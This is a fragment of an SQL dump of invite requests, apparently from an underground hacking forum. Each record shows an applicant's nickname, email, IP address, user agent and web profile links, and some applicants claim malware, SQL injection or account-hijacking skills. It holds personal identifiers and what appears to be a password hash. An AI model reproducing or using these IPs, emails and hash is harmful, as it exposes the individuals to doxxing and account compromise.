https://twitter.com/GoodTrip_kyoto \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1522, 1378, 0, 'Invite', 2, '{$name}', 1407767801, '[SIZE=\'4\'][COLOR=\'Sienna\']bluesky22[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: bluesky22@jabber.ru\n[b]e-mail[/b]: bluesky22@bk.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 192.243.126.249\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.citysearch.com/profile/...oh/hess_jewelers.html | http://www.citysearch.com/profile/...oh/hess_jewelers.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1523, 1379, 0, 'Invite', 2, '{$name}', 1407768727, '[SIZE=\'4\'][COLOR=\'Sienna\']ru_vor[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: trafx@rows.io\n[b]e-mail[/b]: 9.6.9.6.7.9.6@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 178.17.170.19\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://video.yandex.ru/users/voryvzakone/view/1/user-tag/тðту/ | http://video.yandex.ru/users/voryvzakone/view/1/user-tag/тðту/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1524, 1380, 0, 'Invite', 2, '{$name}', 1407777645, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@kakak.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1525, 1381, 0, 'Invite', 2, '{$name}', 1407777690, '[SIZE=\'4\'][COLOR=\'Sienna\']w0rm_123[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: w0rm_123@123.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.xboxlivescore.com/profile/blAck-w0rm123 | http://www.xboxlivescore.com/profile/blAck-w0rm123 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1526, 1382, 0, 'Invite', 2, '{$name}', 1407778611, '[SIZE=\'4\'][COLOR=\'Sienna\']lamarez[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 123424, lam@xip.su\n[b]e-mail[/b]: alex.boesky@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 78.111.187.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/LAMAREZ | https://twitter.com/LAMAREZ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1527, 1383, 0, 'Invite', 2, '{$name}', 1407779838, '[SIZE=\'4\'][COLOR=\'Sienna\']w0rm_w0rm[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: TEST@TEST.RU\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://crdpro.su/member.php?u=44946 | http://crdpro.su/member.php?u=44946 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1528, 1384, 0, 'Invite', 2, '{$name}', 1407785744, '[SIZE=\'4\'][COLOR=\'Sienna\']w3c[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 123123123\n[b]e-mail[/b]: asdasd@asdasd.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://w3c.github.io | w3c.github.io \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1529, 1385, 0, 'Invite', 2, '{$name}', 1407788800, '[SIZE=\'4\'][COLOR=\'Sienna\']joe_doe[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: qqaaaaaaa@q.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://poisk.facecam.ru/user/3352716 | http://poisk.facecam.ru/user/3352716 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1530, 1386, 0, 'Invite', 2, '{$name}', 1407788938, '[SIZE=\'4\'][COLOR=\'Sienna\']SkyJeb[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 672409992\n[b]e-mail[/b]: au.skyjeb@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 87.217.193.81\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/skyjeb | https://twitter.com/skyjeb \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1531, 1387, 0, 'Invite', 2, '{$name}', 1407789019, '[SIZE=\'4\'][COLOR=\'Sienna\']SkyJeb[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 672409992\n[b]e-mail[/b]: au.skyjeb@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 87.217.193.81\n[*][b]real ip[/b]: 87.217.193.81\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/skyjeb | https://twitter.com/skyjeb \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1532, 1388, 0, 'Invite', 2, '{$name}', 1407789032, '[SIZE=\'4\'][COLOR=\'Sienna\']SkyJeb[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 672409992\n[b]e-mail[/b]: au.skyjeb@gmail.com\n[b]Info[/b]: Hello,\r\n\r\nI am a systems administrator and pentester for a company. My skills are malware detection and development, I can exploit any kind of SQL Injection on a website as part of my work. Now I am learning exploit research and development.\r\n\r\nAnd most important is: I don’t have CERTS. I have learned all by myself (I learn fast). For ex. If you can give me some time and some direction, I can make anything.\r\n\r\nThank you,\r\nSkyJeb\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 87.217.193.81\n[*][b]real ip[/b]: 87.217.193.81\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/skyjeb | https://twitter.com/skyjeb \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1533, 1389, 0, 'Invite', 2, '{$name}', 1407789113, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@asd.s\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1534, 1390, 0, 'Invite', 2, '{$name}', 1407792003, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname_999[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email((((((9999999\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.shayri.com/forums/member.php?u=19167 | http://www.shayri.com/forums/member.php?u=19167 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1535, 1391, 0, 'Invite', 2, '{$name}', 1407793305, '[SIZE=\'4\'][COLOR=\'Sienna\']sdasd[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 23123\n[b]e-mail[/b]: aaa@bb.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.odnoklassniki.ru/group/51918203191484 | http://www.odnoklassniki.ru/group/51918203191484 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1536, 1392, 0, 'Invite', 2, '{$name}', 1407794011, '[SIZE=\'4\'][COLOR=\'Sienna\']izg0y[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: izg0y@gmail\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: 46.146.211.11\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Izg0y : Izg0y1@gmail.com : 95.30.193.97 : 32d1821827468511bcb77c1b26cc12a3\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://exploit.in/forum/index.php?showuser=49176 | https://exploit.in/forum/index.php?showuser=49176 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1537, 1393, 0, 'Invite', 2, '{$name}', 1407795495, '[SIZE=\'4\'][COLOR=\'Sienna\']Lin Kode[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 674146169\n[b]e-mail[/b]: daisukedan@null.net\n[b]Info[/b]: Hacktivist, underground hacker, security researcher, hacking feds as always.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 78.124.159.186\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1538, 1394, 0, 'Invite', 2, '{$name}', 1407799119, '[SIZE=\'4\'][COLOR=\'Sienna\']neuegram[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: neuegram@jabber.ccc.de\n[b]e-mail[/b]: neuegram@gmail.com\n[b]Info[/b]: Reverse-engineering (phone numbers / account hijacking), XSS/CSRF, SQLi\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 76.187.57.251\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.tf2outpost.com/user/76561198028613297 | http://www.tf2outpost.com/user/76561198028613297 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1539, 1395, 0, 'Invite', 2, '{$name}', 1407799401, '[SIZE=\'4\'][COLOR=\'Sienna\']neuegram[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: neuegram@jabber.ccc.de\n[b]e-mail[/b]: neuegram@gmail.com\n[b]Info[/b]: Reverse-engineering (phone numbers / account hijacking), XSS/CSRF, SQLi\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request 